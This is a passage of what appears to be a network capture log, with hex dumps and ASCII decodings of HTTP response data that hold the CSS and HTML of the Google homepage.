6b 67 72 6f 75 6e 64 3a 23 35 30 39 34 65 64 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 32 70 78 20 30 20 72
                                                                                                                                                                      Data Ascii: gb_3.gb_3.gb_9d,#gb a.gb_2.gb_2.gb_9d{cursor:pointer}.gb_3.gb_9d:hover{background:#2b7de9;box-shadow:0 1px 2px 0 rgba(66,133,244,0.3),0 1px 3px 1px rgba(66,133,244,0.15)}.gb_3.gb_9d:focus,.gb_3.gb_9d:hover:focus{background:#5094ed;box-shadow:0 1px 2px 0 r
                                                                                                                                                                      2021-09-14 14:03:24 UTC72INData Raw: 63 75 73 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 61 36 63 36 66 61 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 23 67 62 20 61 2e 67 62 5f 39 64 2e 67 62 5f 32 3a 61 63 74 69 76 65 2c 23 67 62 20 2e 67 62 5f 76 63 20 61 2e 67 62 5f 39 64 3a 61 63 74 69 76 65 2c 23 67 62 2e 67 62 5f 76 63 20 61 2e 67 62 5f 39 64 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 65 63 66 33 66 65 7d 23 67 62 20 61 2e 67 62 5f 33 2e 67 62 5f 6a 61 2e 67 62 5f 39 64 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 61 31 63 33 66 39 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 36 30 2c 36 34 2c 36 37 2c 30 2e 33 29 2c 30 20
                                                                                                                                                                      Data Ascii: cus:hover{background:#a6c6fa;border-color:transparent;box-shadow:none}#gb a.gb_9d.gb_2:active,#gb .gb_vc a.gb_9d:active,#gb.gb_vc a.gb_9d:active{background:#ecf3fe}#gb a.gb_3.gb_ja.gb_9d:active{background:#a1c3f9;box-shadow:0 1px 2px rgba(60,64,67,0.3),0
                                                                                                                                                                      2021-09-14 14:03:24 UTC73INData Raw: 31 70 78 20 73 6f 6c 69 64 20 23 35 66 36 33 36 38 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 33 34 33 38 7d 2e 67 62 5f 6d 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 37 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 32 70 78 3b 77 69 64 74 68 3a 37 38 70 78 7d 2e 67 62 5f 69 61 2e 67 62 5f 6a 61 20 2e 67 62 5f 6d 61 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 70 78 3b 77 69 64 74 68 3a 37 32 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 7d
                                                                                                                                                                      Data Ascii: 1px solid #5f6368;background-color:#333438}.gb_ma{display:inline-block;padding-left:7px;padding-bottom:2px;text-align:center;vertical-align:middle;line-height:32px;width:78px}.gb_ia.gb_ja .gb_ma{line-height:26px;width:72px;padding-left:0;padding-bottom:0}
                                                                                                                                                                      2021-09-14 14:03:24 UTC75INData Raw: 2d 72 61 74 69 6f 3a 31 2e 32 35 29 7b 2e 67 62 5f 43 61 3a 3a 62 65 66 6f 72 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 35 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 35 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 6c 65 66 74 20 30 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 6c 65 66 74 20 30 7d 2e 67 62 5f 48 61 3a 3a 62 65 66 6f 72 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 35 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 35 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 6c 65 66 74 20 30 3b 74 72
                                                                                                                                                                      Data Ascii: -ratio:1.25){.gb_Ca::before{display:inline-block;-ms-transform:scale(.5);transform:scale(.5);-ms-transform-origin:left 0;transform-origin:left 0}.gb_Ha::before{display:inline-block;-ms-transform:scale(.5);transform:scale(.5);-ms-transform-origin:left 0;tr
                                                                                                                                                                      2021-09-14 14:03:24 UTC76INData Raw: 68 6f 76 65 72 2c 2e 67 62 5f 69 20 2e 67 62 5f 43 61 3a 68 6f 76 65 72 2c 2e 67 62 5f 44 20 2e 67 62 5f 43 61 3a 66 6f 63 75 73 2c 2e 67 62 5f 69 20 2e 67 62 5f 43 61 3a 66 6f 63 75 73 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 35 29 20 2c 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 20 7d 2e 67 62 5f 50 61 20 2e 67 62 5f 4e 61 2c 2e 67 62 5f 51 61 20 2e 67 62 5f 4e 61 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 31 70 78 7d 2e 67 62 5f 4e 61 2e 67 62 5f 68 2c 2e 67 62 5f 52 61 2e 67 62 5f 68 2c 2e 67 62 5f 4d 61 2e 67 62 5f 68 7b 66 6c 65 78 3a 30 20 31 20 61 75 74 6f 3b 66 6c 65 78 3a 30 20 31 20 6d 61 69 6e 2d 73 69 7a 65 7d 2e 67 62
                                                                                                                                                                      Data Ascii: hover,.gb_i .gb_Ca:hover,.gb_D .gb_Ca:focus,.gb_i .gb_Ca:focus{box-shadow: 0 1px 0 rgba(0,0,0,.15) , 0 1px 2px rgba(0,0,0,.2) }.gb_Pa .gb_Na,.gb_Qa .gb_Na{position:absolute;right:1px}.gb_Na.gb_h,.gb_Ra.gb_h,.gb_Ma.gb_h{flex:0 1 auto;flex:0 1 main-size}.gb
                                                                                                                                                                      2021-09-14 14:03:24 UTC77INData Raw: 38 30 30 30 0d 0a 63 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 67 62 5f 32 63 20 2e 67 62 5f 36 63 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 38 70 78 3b 72 69 67 68 74 3a 32 34 70 78 7d 2e 67 62 5f 36 63 20 2e 67 62 5f 37 63 7b 68 65 69 67 68 74 3a 31 2e 35 65 6d 3b 6d 61 72 67 69 6e 3a 2d 2e 32 35 65 6d 20 31 30 70 78 20 2d 2e 32 35 65 6d 20 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 65 78 74 2d 74 6f 70 3b 77 69 64 74 68 3a 31 2e 35 65 6d 7d 2e 67 62 5f 38 63 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 63 6f 6c
                                                                                                                                                                      Data Ascii: 8000c{background-color:inherit}.gb_2c .gb_6c{display:inline-block;position:absolute;top:18px;right:24px}.gb_6c .gb_7c{height:1.5em;margin:-.25em 10px -.25em 0;vertical-align:text-top;width:1.5em}.gb_8c{line-height:20px;font-size:16px;font-weight:700;col
                                                                                                                                                                      2021-09-14 14:03:24 UTC78INData Raw: 6f 74 6f 2c 52 6f 62 6f 74 6f 44 72 61 66 74 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 30 2e 32 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 37 30 70 78 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 2e 67 62 5f 5a 2e 67 62 5f 6b 64 2e 67 62 5f 6a 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 68 65 69 67 68 74 3a 33 36 70 78 3b 63 6f 6c 6f 72 3a 23 35 66
                                                                                                                                                                      Data Ascii: oto,RobotoDraft,Helvetica,Arial,sans-serif;font-size:14px;font-weight:500;letter-spacing:0.25px;line-height:16px;min-width:70px;outline:none;text-transform:none}.gb_Z.gb_kd.gb_jd{border-radius:4px;box-sizing:border-box;cursor:pointer;height:36px;color:#5f
                                                                                                                                                                      2021-09-14 14:03:24 UTC80INData Raw: 74 6f 6d 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 5f 6c 64 20 2e 67 62 5f 6d 64 2c 2e 67 62 5f 6c 64 20 2e 67 62 5f 6e 64 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 32 70 78 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 61 2e 67 62 5f 33 2e 67 62 5f 6d 64 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 62 37 64 65 39 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 32 70 78 20 30 20 72 67 62 61 28 36 36 2c 31 33 33 2c 32 34 34 2c 30 2e 33 29 2c 30 20 31 70 78 20 33 70 78 20 31 70 78 20 72 67 62 61 28 36 36 2c 31 33 33 2c 32 34 34 2c 30 2e 31 35 29 7d 61 2e 67 62 5f 33 2e 67 62 5f 6d 64 3a 66 6f 63
                                                                                                                                                                      Data Ascii: tom:0;white-space:nowrap}.gb_ld .gb_md,.gb_ld .gb_nd{margin-left:12px;text-transform:none}a.gb_3.gb_md:hover{background-color:#2b7de9;border-color:transparent;box-shadow:0 1px 2px 0 rgba(66,133,244,0.3),0 1px 3px 1px rgba(66,133,244,0.15)}a.gb_3.gb_md:foc
                                                                                                                                                                      2021-09-14 14:03:24 UTC81INData Raw: 67 69 6e 3a 30 7d 2e 67 62 5f 63 64 20 2e 67 62 5f 33 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 34 64 39 30 66 65 3b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 31 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 37 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 67 62 5f 63 64 20 61 2e 67 62 5f 33 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 31 61 37 33 65 38 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 52 6f 62 6f 74 6f 2c 52 6f 62 6f
                                                                                                                                                                      Data Ascii: gin:0}.gb_cd .gb_3c{background:#4d90fe;border:2px solid transparent;box-sizing:border-box;font-weight:500;margin-top:21px;min-width:70px;text-align:center}.gb_cd a.gb_3{background:#1a73e8;border-radius:4px;color:#ffffff;font-family:Google Sans,Roboto,Robo
                                                                                                                                                                      2021-09-14 14:03:24 UTC82INData Raw: 68 3a 34 38 70 78 7d 2e 67 62 5f 70 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 33 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 5f 63 64 20 2e 67 62 5f 70 64 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 34 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 36 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 70 78 3b 77 69 64 74 68 3a 33 32 36 70 78 7d 2e 67 62 5f 63 64 2e 67 62 5f 79 64 20 2e 67 62 5f 70 64 7b 6d 69 6e 2d 77 69 64 74 68 3a 32 35 34 70 78 3b 77 69 64 74 68 3a 32 35 34 70 78 7d 2e 67 62 5f 63 64 2e 67 62 5f 77 64 20 2e 67 62 5f 70 64 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 32 70 78 7d 2e 67 62 5f 42 64 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64
                                                                                                                                                                      Data Ascii: h:48px}.gb_pd{padding-left:13px;width:100%}.gb_cd .gb_pd{padding-top:4px;min-width:326px;padding-left:0px;width:326px}.gb_cd.gb_yd .gb_pd{min-width:254px;width:254px}.gb_cd.gb_wd .gb_pd{padding-top:32px}.gb_Bd{color:#ffffff;font-size:13px;font-weight:bold
                                                                                                                                                                      2021-09-14 14:03:24 UTC83INData Raw: 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 34 29 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 73 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 34 29 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 29 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 29 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 73
                                                                                                                                                                      Data Ascii: r-gradient(top,rgba(0,0,0,0.14),rgba(0,0,0,0.2));background-image:-ms-linear-gradient(top,rgba(0,0,0,0.14),rgba(0,0,0,0.2));border:1px solid rgba(0,0,0,0.2);box-shadow:0 1px 1px rgba(0,0,0,0.1);filter:progid:DXImageTransform.Microsoft.gradient(startColors
                                                                                                                                                                      2021-09-14 14:03:24 UTC85INData Raw: 34 65 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 30 70 78 7d 2e 71 61 72 73 74 62 7b 66 6c 65 78 2d 67 72 6f 77 3a 31 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4c 33 65 55 67 62 22 20 64 61 74 61 2d 68 76 65 69 64 3d 22 31 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 33 6a 39 39 20 6e 31 78 4a 63 66 20 4e 65 36 6e 53 64 22 3e 3c 73 74 79 6c 65 3e 2e 4e 65 36 6e 53 64 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 36 70 78 7d 61 2e 4d 56 33 54 6e 62 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 35 70 78 3b 6d 61 72 67 69 6e 3a 30 20 35 70 78 3b 63 6f 6c 6f 72 3a 23 32 32 32 7d 61 2e 4d 56 33 54 6e 62 3a 66 69 72 73 74
                                                                                                                                                                      Data Ascii: 4e{max-height:160px}.qarstb{flex-grow:1}</style><div class="L3eUgb" data-hveid="1"><div class="o3j99 n1xJcf Ne6nSd"><style>.Ne6nSd{display:flex;align-items:center;padding:6px}a.MV3Tnb{display:inline-block;padding:5px;margin:0 5px;color:#222}a.MV3Tnb:first
                                                                                                                                                                      2021-09-14 14:03:24 UTC86INData Raw: 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 5f 53 65 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 5f 4e 63 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 5f 42 20 67 62 5f 62 64 20 67 62 5f 68 20 67 62 5f 41 66 22 20 64 61 74 61 2d 6f 67 73 72 2d 66 62 3d 22 74 72 75 65 22 20 64 61 74 61 2d 6f 67 73 72 2d 61 6c 74 3d 22 22 20 69 64 3d 22 67 62 77 61 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 5f 7a 66 22 3e 3c 61 20 63 6c 61 73 73 3d 22 67 62 5f 43 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 6f 6f 67 6c 65 20 61 70 70 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 69 6e 74 6c 2f 65 6e 2f 61 62 6f 75 74 2f 70 72 6f 64 75 63 74 73 22 20 61 72 69 61 2d 65 78 70 61 6e
                                                                                                                                                                      Data Ascii: div></div><div class="gb_Se"><div class="gb_Nc"><div class="gb_B gb_bd gb_h gb_Af" data-ogsr-fb="true" data-ogsr-alt="" id="gbwa"><div class="gb_zf"><a class="gb_C" aria-label="Google apps" href="https://www.google.co.uk/intl/en/about/products" aria-expan
                                                                                                                                                                      2021-09-14 14:03:24 UTC87INData Raw: 75 74 6f 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6b 31 7a 49 41 20 72 53 6b 34 73 65 22 3e 3c 73 74 79 6c 65 3e 2e 72 53 6b 34 73 65 7b 6d 61 78 2d 68 65 69 67 68 74 3a 39 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 6e 58 64 70 64 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6f 62 6a 65 63 74 2d 66 69 74 3a 63 6f 6e 74 61 69 6e 3b 6f 62 6a 65 63 74 2d 70 6f 73 69 74 69 6f 6e 3a 63 65 6e 74 65 72 20 62 6f 74 74 6f 6d 3b 77 69 64 74 68 3a 61 75 74 6f 7d 3c 2f 73 74 79 6c 65 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 6c 6e 58 64 70 64 22 20 61 6c 74 3d 22 47 6f 6f 67 6c 65 22 20 68 65 69 67 68 74 3d 22 39 32 22 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61
                                                                                                                                                                      Data Ascii: uto}</style><div class="k1zIA rSk4se"><style>.rSk4se{max-height:92px;position:relative}.lnXdpd{max-height:100%;max-width:100%;object-fit:contain;object-position:center bottom;width:auto}</style><img class="lnXdpd" alt="Google" height="92" src="/images/bra
                                                                                                                                                                      2021-09-14 14:03:24 UTC89INData Raw: 6d 63 61 76 20 2e 52 4e 4e 58 67 62 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 30 7d 2e 65 6d 63 61 76 2e 65 6d 63 61 74 20 2e 52 4e 4e 58 67 62 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 32 34 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 32 34 70 78 7d 2e 6d 69 6e 69 64 69 76 20 2e 65 6d 63 61 76 2e 65 6d 63 61 74 20 2e 52 4e 4e 58 67 62 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 31 36 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 31 36 70 78 7d 2e 52 4e 4e 58 67 62 3a
                                                                                                                                                                      Data Ascii: mcav .RNNXgb{border-bottom-left-radius:0;border-bottom-right-radius:0}.emcav.emcat .RNNXgb{border-bottom-left-radius:24px;border-bottom-right-radius:24px}.minidiv .emcav.emcat .RNNXgb{border-bottom-left-radius:16px;border-bottom-right-radius:16px}.RNNXgb:
                                                                                                                                                                      2021-09-14 14:03:24 UTC90INData Raw: 73 74 79 6c 65 3e 2e 67 4c 46 79 66 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 38 37 29 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 30 30 25 3b 2d 6d 73 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 33 37 70 78 3b 68 65 69 67 68 74 3a 33 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 2e 6d 69 6e 69 64 69 76 20 2e 67 4c 46 79 66 7b 6d 61 72 67 69 6e
                                                                                                                                                                      Data Ascii: style>.gLFyf{background-color:transparent;border:none;margin:0;padding:0;color:rgba(0,0,0,.87);word-wrap:break-word;outline:none;display:flex;flex:100%;-ms-tap-highlight-color:transparent;margin-top:-37px;height:34px;font-size:16px;}.minidiv .gLFyf{margin
                                                                                                                                                                      2021-09-14 14:03:24 UTC91INData Raw: 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 62 6f 72 64 65 72 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 20 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 34 70 78 7d 2e 4d 32 76 56 33 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 45 78 43 4b 6b 66 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 63 6f 6c 6f 72 3a 23 37 30 37 35 37 61 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 2e 6d 69 6e 69 64 69 76 20 2e 42 4b 52 50 65 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 32 70 78 7d 2e 6d 69 6e 69 64 69 76 20 2e 45 78 43 4b 6b 66 7b 77 69 64 74 68 3a 32 30 70 78 7d 3c 2f 73 74 79 6c 65
                                                                                                                                                                      Data Ascii: r;align-items:center;border:0;background:transparent;outline:none;padding:0 8px;line-height:44px}.M2vV3{display:flex}.ExCKkf{height:100%;color:#70757a;vertical-align:middle;outline:none}.minidiv .BKRPef{line-height:32px}.minidiv .ExCKkf{width:20px}</style
                                                                                                                                                                      2021-09-14 14:03:24 UTC92INData Raw: 31 36 70 78 7d 2e 65 72 6b 76 51 65 7b 66 6c 65 78 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 38 70 78 3b 7d 2e 52 6a 50 75 56 62 7b 68 65 69 67 68 74 3a 31 70 78 3b 6d 61 72 67 69 6e 3a 30 20 32 36 70 78 20 30 20 30 7d 2e 53 33 6e 46 6e 64 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 53 33 6e 46 6e 64 20 2e 52 6a 50 75 56 62 2c 2e 53 33 6e 46 6e 64 20 2e 61 61 6a 5a 43 62 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 7d 2e 6c 68 38 37 6b 65 3a 6c 69 6e 6b 2c 2e 6c 68 38 37 6b 65 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 31 61 30 64 61 62 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 66 6f 6e 74 3a 31 31 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
                                                                                                                                                                      Data Ascii: 16px}.erkvQe{flex:auto;padding-bottom:8px;}.RjPuVb{height:1px;margin:0 26px 0 0}.S3nFnd{display:flex}.S3nFnd .RjPuVb,.S3nFnd .aajZCb{flex:0 0 auto}.lh87ke:link,.lh87ke:visited{color:#1a0dab;cursor:pointer;font:11px arial,sans-serif;padding:0 5px;margin-to
                                                                                                                                                                      2021-09-14 14:03:24 UTC94INData Raw: 66 61 6d 69 6c 79 3a 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2d 6d 65 64 69 75 6d 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6d 61 72 67 69 6e 3a 30 20 32 30 70 78 20 30 20 31 36 70 78 3b 70 61 64 64 69 6e 67 3a 38 70 78 20 30 20 38 70 78 20 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 79 6e 52 72 69 63 22 20 69 64 3d 22 79 6e 52 72 69 63 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 3e 3c 2f 6c 69 3e 3c 73 74 79 6c 65 3e 23 59 4d 58 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 73 62 63 74 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74
                                                                                                                                                                      Data Ascii: family:Google Sans,arial,sans-serif-medium,sans-serif;font-size:14px;margin:0 20px 0 16px;padding:8px 0 8px 0;line-height:16px;width:100%}</style><li class="ynRric" id="ynRric" role="presentation"></li><style>#YMXe{display:none}.sbct{display:flex;align-it
